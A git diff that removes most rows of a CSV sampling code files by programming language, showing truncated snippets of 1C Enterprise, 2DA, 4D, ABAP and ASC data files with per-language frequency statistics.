diff --git "a/stackv2_languages_freq.csv" "b/stackv2_languages_freq.csv" --- "a/stackv2_languages_freq.csv" +++ "b/stackv2_languages_freq.csv" @@ -1,232899 +1,3 @@ -"blob_id","filename","extension","language","content","lang_ext_count","ext_fraction_per_lang","generated_fraction","vendor_fraction" -"126cb38a1618a411b7cef36f3a04dd00a82accec","Module.bsl",".bsl","1C Enterprise"," -#Область ОбработчикиСобытийФормы - -&НаСервере -Процедура ПриСозданииНаСервере(Отказ, СтандартнаяОбработка) - - // Пропускаем инициализацию, чтобы гарантировать получение формы при передаче параметра ""АвтоТест"". - Если Параметры.Свойство(""АвтоТест"") Тогда - Возврат; - КонецЕсли; - - Параметры.Свойство(""Идентификатор"", Идентификатор); - Параметры.Свойство(""ДрайверОборудования"", ДрайверОборудования); - - Заголовок = НСтр(""ru='Оборудование:'"") + Символы.НПП + Строка(Идентификатор); - - ЦветТекста = ЦветаСтиля.ЦветТекстаФормы; - ЦветОшибки = ЦветаСтиля.ЦветОтрицательногоЧисла; - - СписокПорт = Элементы.Порт.СписокВыбора; - СписокПорт.Добавить(100, НСтр(""ru='<Клавиатура>'"")); - Для Индекс = 1 По 64 Цикл - СписокПорт.Добавить(Индекс, ""COM"" + СокрЛП(Индекс)); - КонецЦикла; - - СписокСкорость = Элементы.Скорость.СписокВыбора; - СписокСкорость.Добавить(1, ""300""); - СписокСкорость.Добавить(2, ""600""); - СписокСкорость.Добавить(3, ""1200""); - СписокСкорость.Добавить(4, ""2400""); - Список","792","0.8989784335981839","0.0","0.0" -"0f4e5b38caf969306c08093e8a0957afb231f1d6","Module.bsl",".bsl","1C Enterprise","//////////////////////////////////////////////////////////////////////////////// -// Обновление информационной базы ERM. -// -//////////////////////////////////////////////////////////////////////////////// - -#Область ПрограммныйИнтерфейс - -//////////////////////////////////////////////////////////////////////////////// -// Сведения о библиотеке (или конфигурации). - -// См. описание в общем модуле ОбновлениеИнформационнойБазыБСП. -Процедура ПриДобавленииПодсистемы(Описание) Экспорт - - Описание.Имя = Метаданные.Имя; - Описание.Версия = Метаданные.Версия; - - // Требуется библиотека стандартных подсистем. - Описание.ТребуемыеПодсистемы.Добавить(""СтандартныеПодсистемы""); - -КонецПроцедуры - -//////////////////////////////////////////////////////////////////////////////// -// Обработчики обновления информационной базы. - -// Добавляет в список процедуры-обработчики обновления данных ИБ -// для всех поддерживаемых версий библиотеки или конфигурации. -// Вызывается перед началом обновления данных ИБ для пост","792","0.8989784335981839","0.0","0.0" -"0607bc0930476fb9392f09e657cf974860b5d8bc","Module.bsl",".bsl","1C Enterprise","//////////////////////////////////////////////////////////////////////////////// -// ОБРАБОТЧИКИ СОБЫТИЙ ФОРМЫ - -&НаСервере -Процедура ПриСозданииНаСервере(Отказ, СтандартнаяОбработка) - - Если Параметры.Ключ.Пустая() Тогда - ПодготовитьФормуНаСервере(); - КонецЕсли; - - Если Параметры.Свойство(""ИзменитьВидОперации"") Тогда - ИзменитьВидОперации = Истина; - КонецЕсли; - - // СтандартныеПодсистемы.ВерсионированиеОбъектов - ВерсионированиеОбъектов.ПриСозданииНаСервере(ЭтотОбъект); - // Конец СтандартныеПодсистемы.ВерсионированиеОбъектов - -КонецПроцедуры - -&НаСервере -Процедура ПриЧтенииНаСервере(ТекущийОбъект) - - ПодготовитьФормуНаСервере(); - -КонецПроцедуры - -//////////////////////////////////////////////////////////////////////////////// -// ОБРАБОТЧИКИ К��МАНД ФОРМЫ - -&НаКлиенте -Процедура ОткрытьДокумент(Команда) - - СтрокаТаблицы = Элементы.СписокВидовОпераций.ТекущиеДанные; - - Если НЕ СтрокаТаблицы = Неопределено Тогда - - ОткрытьДокументВида(СтрокаТаблицы.Значен","792","0.8989784335981839","0.0","0.0" -"018ac456104b153918556ba846b437b8132b01a9","Module.bsl",".bsl","1C Enterprise","//начало текста модуля - -/////////////////////////////////////////////////// -//Служебные функции и процедуры -/////////////////////////////////////////////////// - -&НаКлиенте -// контекст фреймворка Vanessa-Behavior -Перем Ванесса; - -&НаКлиенте -// Структура, в которой хранится состояние сценария между выполнением шагов. Очищается перед выполнением каждого сценария. -Перем Контекст Экспорт; - -&НаКлиенте -// Структура, в которой можно хранить служебные данные между запусками сценариев. Существует, пока открыта форма Vanessa-Behavior. -Перем КонтекстСохраняемый Экспорт; - -&НаКлиенте -// Служебная функция. -Функция ДобавитьШагВМассивТестов(МассивТестов,Снипет,ИмяПроцедуры,ПредставлениеТеста = Неопределено,Транзакция = Неопределено,Параметр = Неопределено) - Структура = Новый Структура; - Структура.Вставить(""Снипет"",Снипет); - Структура.Вставить(""ИмяПроцедуры"",ИмяПроцедуры); - Структура.Вставить(""ИмяПроцедуры"",ИмяПроцедуры); - Структура.Вставить(""ПредставлениеТеста"",ПредставлениеТеста); - Структура.Вставит","792","0.8989784335981839","0.0","0.0" -"0620e7437bf9d37334dc1a0b1fc93ecd34e6833f","ManagerModule.bsl",".bsl","1C Enterprise"," -Функция ДокументЗарегестрированВПривязках(ДокументССылка) Экспорт - - Запрос = Новый Запрос; - Запрос.Текст = - ""ВЫБРАТЬ - | ВЫБОР - | КОГДА &ДокументСсылка В - | (ВЫБРАТЬ - | Привязки.Поступление КАК ЗаписиРегистра - | ИЗ - | РегистрСведений.Привязки КАК Привязки - | ГДЕ - | Привязки.Поступление = &ДокументСсылка - | - | ОБЪЕДИНИТЬ ВСЕ - | - | ВЫБРАТЬ - | Привязки.Реализация - | ИЗ - | РегистрСведений.Привязки КАК Привязки - | ГДЕ - | Привязки.Реализация = &ДокументСсылка) - | ТОГДА ИСТИНА - | ИНАЧЕ ЛОЖЬ - | КОНЕЦ КАК ЕстьДокументы""; - - Запрос.УстановитьПараметр(""ДокументСсылка"", ДокументСсылка); - - Результат = Запрос.Выполнить(); - - ВыборкаДетальныеЗаписи = Результат.Выбрать(); - - Если ВыборкаДетальныеЗаписи.Следующий() Тогда - Возврат ВыборкаДетальныеЗаписи.ЕстьДокументы; - КонецЕсли; - - Возврат Ложь; - -КонецФункции - -Функция ВернутьСписокПриходовПоРеализации(ДокументСсылкаРеализация) Экспорт - - СписокПоступлений = Новый СписокЗначений; -","792","0.8989784335981839","0.0","0.0" -"0fc5232c4aa785ebc20851051209ad47b226741b","zshrc.os",".os","1C Enterprise","export LS_COLORS='di=1;36:ln=1;35:so=1;32:pi=1;93:ex=1;31:bd=1;34;46:cd=1;34;103:su=1;37;41:sg=1;37;46:tw=1;37;42:ow=1;37;103:' -","48","0.05448354143019296","0.0","0.0" -"12ec9233ec535173d71c84915884e04c62c59466","js.os",".os","1C Enterprise","var runJSStringResult = runJSStringResult -var index = 0 - -var function importJSValue(ret){ - ret === ""ok::true"" && return true - ret === ""ok::false"" && return false - ret === ""ok::null"" && return null - var prefix = ret.sub(0, 9) - prefix === ""ok::str::"" && return ret.sub(9) - prefix === ""ok::num::"" && return toNumber(ret.sub(9)) - prefix === ""ok::obj::"" && return importJSObject(toNumber(ret.sub(9)), ""object"") - prefix === ""ok::fun::"" && return importJSObject(toNumber(ret.sub(9)), ""function"") - throw ret -} - -var exportValues = {} -var exportValuesByIndex = {} - -var function exportValue(value){ - var type = typeOf(value) - if(type == ""null"" || type == ""boolean"" || type == ""number"" || type == ""string""){ - return json.encode(value) - } - if(""__javaScriptObjectIndex__"" in value){ - return ""ObjectScriptInterface.getExportedValue(${value.__javaScriptObjectIndex__})"" - } - if(!(value in exportValues)){ - var index = #exportValues - exportValues[value] = index - exportValuesByIndex[index] = value - } - return ""Obj","48","0.05448354143019296","0.0","0.0" -"0316c1dda8630df2afad2fab0a837b3af3e04952","main.os",".os","1C Enterprise"," -#Использовать ""../internal/cmd"" -#Использовать cli - -#Область Приложение - -Процедура ВыполнитьПриложение() - - ИмяПриложения = ПараметрыПриложения.ИмяПриложения(); - ВерсияПриложения = ПараметрыПриложения.ВерсияПриложения(); - - Приложение = Новый КонсольноеПриложение(ИмяПриложения, - ""Приложение для работы с покрытием кода 1С:Предприятия""); - - Приложение.Версия(""version"", ВерсияПриложения); - - Приложение.ДобавитьКоманду(""start"", ""Начать запись покрытия"", Новый КомандаСтарт()); - Приложение.ДобавитьКоманду(""stop"", ""Остановить запись покрытия"", Новый КомандаСтоп()); - Приложение.ДобавитьКоманду(""convert"", ""Конвертировать результаты покрытия"", Новый КомандаКонвертировать()); - Приложение.ДобавитьКоманду(""lines"", ""Получить файлы которые надо покрыть тестами"", Новый КомандаСтрокиПокрытия()); - Приложение.ДобавитьКоманду(""report"", ""Сформировать отчет покрытия"", Новый КомандаОтчетПокрытия()); - - Приложение.Опция(""d debug"", Ложь, ""Режим отладки"") - .ТБулево(); - - Приложение.Запустить(); - -КонецПроц","48","0.05448354143019296","0.0","0.0" -"0fe3965e92535592eec9a4bd18aa5f2949ea7d6c","GameAjaxController.os",".os","1C Enterprise","GameAjaxController = extends BaseController { - - init = function(){ - super() - header ""Content-Type: application/json"" - // app.user.isLogged || @echoJson{error=""required user.isLogged""} - app.request.isAjax || @echoJson{error=""required request.isAjax""} - }, - - echoJson = function(data, end){ - echo(json.encode(data)) - end !== false && app.end() - }, - - actionLoadTileData = function(x, y, g, zoom){ - x, y, g, zoom = toNumber(x), toNumber(y), toNumber(g), toNumber(zoom) - var tileData = [] - for(var ax = 0; ax < app.params.TILE_SIZE; ax++){ - tileData[ax] = [] - } - math.randomSeed = 1234567890+x*123+y*234+g*345; - var i = math.max(math.abs(x) - (x<0?1:0), math.abs(y) - (y<0?1:0)) - for(var ax = 0; ax < app.params.TILE_SIZE; ax++){ - for(var ay = 0; ay < app.params.TILE_SIZE; ay++){ - if(math.random() <= math.max(0.04, 0.3-i/20)){ - tileData[ax][ay] = { - i = i, - // x = 5, y = 5, - size = math.random(0.3+i/10, math.min(1+ax, 1+ay, app.params.TILE_SIZE-ax, app.params.T","48","0.05448354143019296","0.0","0.0" -"03bc7cc3e9ba5062677c3240bd701b5ae58902a0","test-getMethodList.os",".os","1C Enterprise","#Использовать "".."" - -#Использовать asserts - -Перем юТест; -Перем ГенераторТестов; - -Процедура Инициализация() - ГенераторТестов = Новый ГенераторТестов; -КонецПроцедуры - -Функция ПолучитьСписокТестов(Тестирование) Экспорт - - юТест = Тестирование; - - СписокТестов = Новый Массив; - СписокТестов.Добавить(""Тест_Должен_ПолучитьСписокМетодовCТестами""); - СписокТестов.Добавить(""Тест_Должен_ПолучитьСписокМетодовБезТестов""); - СписокТестов.Добавить(""Тест_Должен_СоздатьТесты""); - - Возврат СписокТестов; - -КонецФункции - -Процедура Тест_Должен_ПолучитьСписокМетодовCТестами() Экспорт - Результат = ГенераторТестов.ПолучитьСписокМетодовCТестами(); - - СписМетодовСтр = """"; - Для каждого Стр Из Результат Цикл - СписМетодовСтр = СписМетодовСтр + "","" + Стр.Имя; - КонецЦикла; - - СписМетодов = "",Количес��воЭлементов,ПреобразоватьКонтрагента""; - - Ожидаем.Что(СписМетодовСтр).Равно(СписМетодов); - -КонецПроцедуры - -Процедура Тест_Должен_ПолучитьСписокМетодовБезТестов() Экспорт - Результат = ГенераторТестов.ПолучитьСписокМетодовБезТ","48","0.05448354143019296","0.0","0.0" -"0ff9f9679de50afcc0e1e3ba55a4097cf0a72c13","ireq_bolt0003.2da",".2da","2-Dimensional Array","2DA V2.0 - - LABEL ReqType ReqParam1 ReqParam2 -0 Bolt_+3 RESULT nw_wammbo010 **** -1 Caster_Level_9th CASTERLVL 9 **** -2 CraftArmsandArmor FEAT 2926 **** -","36","0.6792452830188679","0.0","0.0" -"18659971bfe4bab6c97deeab9bff9ef2bd00821f","defsound.2da",".2da","2-Dimensional Array","2DA V1.0 -* - RESREF -OPEN AMB_D03A -CLOSE AMB_D03B -HOPEN AMB_D04A -HCLOSE AMB_D04B -BUTTON1 GAM_09 -BUTTON2 GAM_03 -BUTTON3 GAM_04 -OPENFAIL AMB_D20 -CLOSEFAIL * -ITEM_GONE EFF_M02 -SECRET ACT_09 -PICKLOCK AMB_D21D -PICKFAIL AMB_D21 -13 * -14 * -15 * -16 * -17 * -18 * -19 * -LIGHTNING1 AMB_E13A -LIGHTNING2 AMB_E13B -LIGHTNING3 AMB_E13F -RAIN AMB_E11 -SNOW AMB_E02B -SOLD ACT_03D -STOLEN GAM_36 -DRUNK GAM_07 -DONATE1 ACT_03 -DONATE2 ACT_03E -IDENTIFY CAS_P04 -GOTXP * -TOOLTIP G_PAPR1 -","36","0.6792452830188679","0.0","0.0" -"13ecccc2cbc220bac5c267aa2f9bd6ddf59f63ae","baseitems.2da",".2da","2-Dimensional Array","2DA V2.0 - - Name label InvSlotWidth InvSlotHeight EquipableSlots CanRotateIcon ModelType ItemClass GenderSpecific Part1EnvMap Part2EnvMap Part3EnvMap DefaultModel DefaultIcon Container WeaponWield WeaponType WeaponSize RangedWeapon PrefAttackDist MinRange MaxRange NumDice DieToRoll CritThreat CritHitMult Category BaseCost Stacking ItemMultiplier Description InvSoundType MaxProps MinProps PropColumn StorePanel ReqFeat0 ReqFeat1 ReqFeat2 ReqFeat3 ReqFeat4 AC_Enchant BaseAC ArmorCheckPen BaseItemStatRef ChargesStarting RotateOnGround TenthLBS WeaponMatType AmmunitionType QBBehaviour ArcaneSpellFailure %AnimSlashL %AnimSlashR %AnimSlashS StorePanelSort ILRStackSize -0 106 shortsword 1 2 0x1C030 1 2 WSwSs 0 1 1 1 it_bag iwswss 0 **** 1 2 **** 1.2 10 255 1 6 ","36","0.6792452830188679","0.0","0.0" -"083818d3d3f78462484e429896500f7c2cf62a45","phenotype.2da",".2da","2-Dimensional Array","2DA V2.0 - - Label Name DefaultPhenoType Constant -0 Normal 2223 0 PHENOTYPE_NORMAL -1 Skinny **** 0 **** -2 Large 2225 0 PHENOTYPE_BIG -3 Normal_M 111015 0 PHENOTYPE_CUSTOM1 -4 **** **** 0 PHENOTYPE_CUSTOM2 -5 Large_M 111016 2 PHENOTYPE_CUSTOM3 -6 N_Joust_M 111017 0 PHENOTYPE_CUSTOM4 -7 **** **** 0 PHENOTYPE_CUSTOM5 -8 L_Joust_M 111018 2 PHENOTYPE_CUSTOM6 -9 NULL7 **** 0 PHENOTYPE_CUSTOM7 -10 NULL8 **** 0 PHENOTYPE_CUSTOM8 -11 NULL9 ","36","0.6792452830188679","0.0","0.0" -"01ab1fa00a39373e3486d465e0146b967b7e6813","feats.2da",".2da","2-Dimensional Array","2DA V1.0 -0 -ID NAMEREF DESCREF BBN BRD CLR DRD FTR MNK PAL RGR ROG SOR WIZ C_ILMATER C_LATHANDER C_SELUNE C_HELM C_OGHMA C_TEMPUS C_BANE C_MASK C_TALOS HUMAN AASIMAR TIEFLING ELF DROW WILD_ELF DWARF GOLD_DWARF GRAY_DWARF HALFLING STRONGHEART_HALFLLING GHOSTWISE_HALFLING GNOME DEEP_GNOME HALF_ELF HALF_ORC -AEGIS_OF_RIME 0 ","36","0.6792452830188679","0.0","0.0" -"0ec69ad50a941b3625e4897f24ee0fa0686e338f","vlXS_BrowserTab.4dm",".4dm","4D","$tab:=Selected list items:C379(vlXS_BrowserTab) -GET LIST ITEM:C378(vlXS_BrowserTab;$tab;vlBWR_SelectedTableRef;vsBWR_selectedTableName) -yBWR_currentTable:=Table:C252(vlBWR_SelectedTableRef) //pointer to the default table displayed in browser - -USR_RegisterUserEvent (UE_TabSelection;vlBWR_SelectedTableRef) - -REDUCE SELECTION:C351(yBWR_currentTable->;0) -BWR_PanelSettings -BWR_SelectTableData - -XS_SetInterface -ALP_SetInterface (xALP_Browser) -","85","1.0897435897435896","0.0","0.0" -"0f20fd8df54f76bbb1b93aa141610e6879ffab59","xALP_ACT_CB_ItemsVenta.4dm",".4dm","4D","//%attributes = {} - //xALP_ACT_CB_ItemsVenta - -C_BOOLEAN:C305($0) -C_LONGINT:C283($1;$2;$3) - -If ($2=8) //soft deselect - $0:=False:C215 -Else - $0:=True:C214 - AL_GetCurrCell (ALP_ItemsVentaRapida;vCol;vRow) - - If (AL_GetCellMod (ALP_ItemsVentaRapida)=1) - Case of - : (vCol=1) - TRACE:C157 - //revisar si se debe cambiar arreglo - //20130626 RCH NF CANTIDAD - arACT_CantidadVVR{vRow}:=Round:C94(arACT_CantidadVVR{vRow};1) - $MontoDef:=Find in array:C230(alACT_IDVR;alACT_IDVVR{vRow}) - If ($MontoDef#-1) - If (arACT_MontoPesosVR{$MontoDef}>0) - arACT_TotalVVR{vRow}:=(arACT_CantidadVVR{vRow}*arACT_MontoPesosVR{$MontoDef})-arACT_DescuentoVVR{vRow} - End if - End if - : (vCol=3) - If ((arACT_DescuentoVVR{vRow}>=0) & (arACT_TotalVVR{vRow}>arACT_DescuentoVVR{vRow})) - $MontoDef:=Find in array:C230(alACT_IDVR;alACT_IDVVR{vRow}) - If ($MontoDef#-1) - If (arACT_MontoPesosVR{$MontoDef}>0) - arACT_TotalVVR{vRow}:=Round:C94((arACT_CantidadVVR{vRow}*arACT_","85","1.0897435897435896","0.0","0.0" -"0f2d6495d8ee322ebcf35ee7a4d7e0ce34de079c","00_Start.4dm",".4dm","4D","//%attributes = {} -C_LONGINT:C283($1) -C_LONGINT:C283($ps;$win) -C_OBJECT:C1216($options) -C_TEXT:C284($cr) - -Case of - : (Count parameters:C259=0) - $ps:=New process:C317(Current method name:C684;0;Current method name:C684;0) - - Else - - If (Shift down:C543) // for debug purpose only - $win:=Open form window:C675(""HDI"";Plain form window:K39:10;Horizontally centered:K39:1;Vertically centered:K39:4) - Else - $win:=Open form window:C675(""HDI"";Pop up form window:K39:11;Horizontally centered:K39:1;Vertically centered:K39:4) - End if - - $options:=New object:C1471 - - $options.title:=""insert or delete rows and columns\ror know what is selected in a table?"" - - $options.blog:=""blog.4d.com"" - $options.info:=""Managing rows and columns in tables"" //ex : ""4D View Pro feature"" - - $options.minimumVersion:=""1800"" // 18R2 means 18R2 1801 means 18.1 (do not use !) - - //$options.license:=4D View license // IF ANY NEEDED - $options.license:=4D Write license:K44:2 // IF ANY NEEDED - ","85","1.0897435897435896","0.0","0.0" -"082b3aa586aa8b5a9993b138c5fe2b001d2e12bf","method.4dm",".4dm","4D","Case of - : (Form event:C388=On Load:K2:1) - XS_SetConfigInterface - ACTinit_LoadPrefs - INSERT IN ARRAY:C227(atACT_TiposDato;1;4) - atACT_TiposDato{1}:=""N"" - atACT_TiposDato{2}:=""AN"" - atACT_TiposDato{3}:=""F"" - atACT_TiposDato{4}:=""H"" - xALP_ACT_RecepRecaud - vt_CharFiller:="""" - vl_LargoReg:=0 - vl_TiposReg:=0 - vl_PreviosReg:=0 - vl_PosterioresReg:=0 - vtACT_BancoNombre:="""" - vtACT_BancoCodigo:="""" - vNombreModelo:="""" - NewFiller:=False:C215 - modificado:=False:C215 - vLastRow:=0 - vLastCol:=0 - alACT_Campo{0}:=0 - atACT_Descripcion{0}:="""" - alACT_Largo{0}:=0 - atACT_TipoDato{0}:="""" - atACT_Posicion{0}:="""" - atACT_Correspondencia{0}:="""" - alACT_PosIni{0}:=0 - alACT_PosFinal{0}:=0 - IT_SetButtonState (False:C215;->bInsertLine;->bDeleteLine;->bTestImport;->bSaveDef;->bLoadDef;->bModelos;->bDeleteModelo;->bSave) - IT_SetEnterable (False:C215;0;->vl_TiposReg;->vl_LargoReg;->vt_CharFiller;->vl_PreviosReg;->vl_PosterioresReg;->vNombreModelo) - : (Form event:C388=On Close Box:K2:21) - vbCF","85","1.0897435897435896","0.0","0.0" -"086fa70d61513159290a314029b7786a00932208","testP1.4dm",".4dm","4D","//%attributes = {} - // MI 13-Apr-2019 22:25:39 (GMT+1) - -C_OBJECT:C1216($1;$banner) -$banner:=$1 - - - // step 1 -$banner.Message(""Please wait "") -$banner.duration:=3 // in seconds -HeartBeat ($banner) - - // step 2 -$banner.Message(""I'm currently working hard"") -$banner.duration:=8 // in seconds -HeartBeat ($banner) - - // Step 3 -$banner.Message(""finishing processing data"") -$banner.duration:=5 // in seconds -HeartBeat ($banner) - - // end process -BEEP:C151 -CALL FORM:C1391($banner.refWindow;""UpdateBanner"";""Now it's done"") -DELAY PROCESS:C323(Current process:C322;60) // Delay 1 sec -CALL FORM:C1391($banner.refWindow;""CloseBanner"") -BEEP:C151 -OBJECT SET VISIBLE:C603(*;""AJUI_Banner"";False:C215) -","85","1.0897435897435896","0.0","0.0" -"014796d88456eed833e8b692c9881f6e20099597","zif_abapgit_gui_event_handler.intf.abap",".abap","ABAP","INTERFACE zif_abapgit_gui_event_handler - PUBLIC . - - TYPES: - BEGIN OF ty_handling_result, - page TYPE REF TO zif_abapgit_gui_renderable, - state TYPE i, - END OF ty_handling_result. - - METHODS on_event - IMPORTING - ii_event TYPE REF TO zif_abapgit_gui_event - RETURNING - VALUE(rs_handled) TYPE ty_handling_result - RAISING - zcx_abapgit_exception. - -ENDINTERFACE. -","216","1.0236966824644549","0.0","0.0" -"0c055cb3aad88b2e94146eab01018b84d63ac46e","ydk_alv.fugr.conversion_exit_ydk01_input.abap",".abap","ABAP","FUNCTION conversion_exit_ydk01_input . -*""-------------------------------------------------------------------- -*""*""Локальный интерфейс: -*"" IMPORTING -*"" REFERENCE(INPUT) -*"" EXPORTING -*"" REFERENCE(OUTPUT) -*""-------------------------------------------------------------------- -* see FM YDK_CONVERSION_EXIT_REGISTER - PERFORM input USING '01' input CHANGING output. -ENDFUNCTION. -","216","1.0236966824644549","0.0","0.0" -"060602cbe8c4745de172d77193755dc3865093f8","ZRPP208R_TRIM_INPUT_PLAN.abap",".abap","ABAP","************************************************************************ -* Program Name : ZRPP208R_TRIM_INPUT_PLAN -* Author : KIM GIL-HYUN (Tonkey) -* Creation Date : 2003.05.10. -* Specifications By : B. Choi -* Pattern : 2.1 -* Development Request No : UD1K910227 -* Addl Documentation: YRPP208R_TRIM_INPUT_PLAN_OLD . -* Description : Trim Input Plan -* -* Modification Logs -* Date Developer RequestNo Description -*#1 03/22/2005 wskim UD1K914858 add weekly data -* 08/03/2005 chris UD1K917193 sort table it_7jb_date internal -* table -************************************************************************ -REPORT zrpp208r_trim_input_plan MESSAGE-ID zmpp . - -TABLES: ztpp_common_vals, ""[PP] COMMON Information Table - ztpp_alc_tinput. ""[PP] Trim Input Plan Table - -INCLUDE . -INCLUDE . -*****// ALV //********************************************************** -TYPE-POOLS: slis. -DATA: gt_f","216","1.0236966824644549","0.0","0.0" -"0fd054b5000ef7a31bd74452a92ef38505e69d5f","zaoc_line_length.prog.abap",".abap","ABAP","REPORT zaoc_line_length. - -* abapOpenChecks -* https://github.com/larshp/abapOpenChecks -* MIT License - -TABLES: tdevc. - -SELECTION-SCREEN BEGIN OF BLOCK b1 WITH FRAME TITLE TEXT-001. -SELECT-OPTIONS: s_devc FOR tdevc-devclass OBLIGATORY. -SELECTION-SCREEN END OF BLOCK b1. - -SELECTION-SCREEN BEGIN OF BLOCK b2 WITH FRAME TITLE TEXT-002. -PARAMETERS: p_split TYPE i DEFAULT 10. -SELECTION-SCREEN END OF BLOCK b2. - -****************************************************************** - -TYPES: BEGIN OF ty_result, - from TYPE string, - count TYPE i, - END OF ty_result. - -TYPES: ty_result_tt TYPE STANDARD TABLE OF ty_result WITH DEFAULT KEY. - -CLASS lcl_app DEFINITION FINAL. - - PUBLIC SECTION. - CLASS-METHODS: - run RETURNING VALUE(rt_result) TYPE ty_result_tt. - - PRIVATE SECTION. - CLASS-DATA: - mt_result TYPE ty_result_tt. - - CLASS-METHODS: - init_result, - run_package IMPORTING iv_devclass TYPE devclass, - run_program IMPORTING iv_program TYPE program. - -ENDCLAS","216","1.0236966824644549","0.0","0.0" -"0ab2cfee6b77a6c042d1ef28ae312108c79d6bdd","sapbc414t_bookings_01.prog.abap",".abap","ABAP","*&---------------------------------------------------------------------* -*& Modulpool SAPBC414T_BOOKINGS_01 * -*&---------------------------------------------------------------------* - -INCLUDE BC414T_BOOKINGS_01TOP. -INCLUDE BC414T_BOOKINGS_01O01. -INCLUDE BC414T_BOOKINGS_01I01. -INCLUDE BC414T_BOOKINGS_01F01. -INCLUDE BC414T_BOOKINGS_01F02. -INCLUDE BC414T_BOOKINGS_01F03. -INCLUDE BC414T_BOOKINGS_01F04. -INCLUDE BC414T_BOOKINGS_01F05. -INCLUDE BC414T_BOOKINGS_01F06. -","216","1.0236966824644549","0.0","0.0" -"0d5a07cad767c1b9c1f7421db020ed22d848af52","TL0003N0409.asc",".asc","AGS Script","ncols 63 -nrows 48 -xllcorner 598000.000000 -yllcorner 5145000.000000 -cellsize 1000.000000 -NODATA_value -9999.0 --9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 --9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 17.080007 14.260359 11.882901 9.297599 -0.551029 -1.165422 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9","633","0.975346687211094","0.0","0.0" -"0f6bbb0c6b2d76d432c33f11c69894fca428dfce","wttopN0108.asc",".asc","AGS Script","ncols 104 -nrows 10 -xllcorner -2.000000 -yllcorner 0.000000 -cellsize 1.000000 -NODATA_value -9999.0 --9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -9999.0 --9999.0 -9999.0 -9999.0 -9999.0 -9999.0 -","633","0.975346687211094","0.0","0.0" -"08a83aee10b7979cf17972f29d53788c234533ed","mtC070301B_idC_-_Scale_x1.000_y0.950_z1.000_-_Clone_1.asc",".asc","AGS Script",";File generated by the BBP-SDK/BBP-MUK Write-ASC program. -(""CellBody"" - (Color Red) - (CellBody) - (-3.49157 7.79219 0.44375 0) ; 1, 1 - (-4.08157 6.07219 1.19375 0) ; 1, 2 - (-4.66155 3.99219 1.25375 0) ; 1, 3 - (-5.30157 2.49219 1.82375 0) ; 1, 4 - (-6.51156 0.56218 1.82375 0) ; 1, 5 - (-6.94155 -1.18782 1.82375 0) ; 1, 6 - (-6.96157 -3.06781 1.75375 0) ; 1, 7 - (-6.42156 -4.73781 1.38375 0) ; 1, 8 - (-5.67156 -6.37781 0.50375 0) ; 1, 9 - (-4.92156 -7.01781 0.25375 0) ; 1, 10 - (-3.08157 -7.72781 0.06375 0) ; 1, 11 - (-2.04156 -8.30782 -0.24625 0) ; 1, 12 - (-1.01156 -9.19781 -0.93625 0) ; 1, 13 - (-0.371576 -9.64781 -2.80625 0) ; 1, 14 - (0.598455 -9.64781 -2.80625 0) ; 1, 15 - (1.66846 -9.32782 -2.80625 0) ; 1, 16 - (2.81843 -8.08781 -2.80625 0) ; 1, 17 - (4.56843 -5.50781 -2.68625 0) ; 1, 18 - (5.74842 -3.73781 -2.18625 0) ; 1, 19 - (6.59846 -1.50781 -1.49625 0) ; 1, 20 - (6.93842 0.592179 -0.49625 0) ; 1, 21 - (7.28846 2.32219 -0.30625 0) ; 1, 22 - (7.43842 ","633","0.975346687211094","0.0","0.0" -"07fcfb0199f58036f58fcc18ac1c5a17d071243f","above 20.asc",".asc","AGS Script","NCOLS 165 -NROWS 81 -XLLCORNER 16.45 -YLLCORNER -34.85 -CELLSIZE 0.1 -NODATA_value -9999 --9999.000000000000000 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 -9999 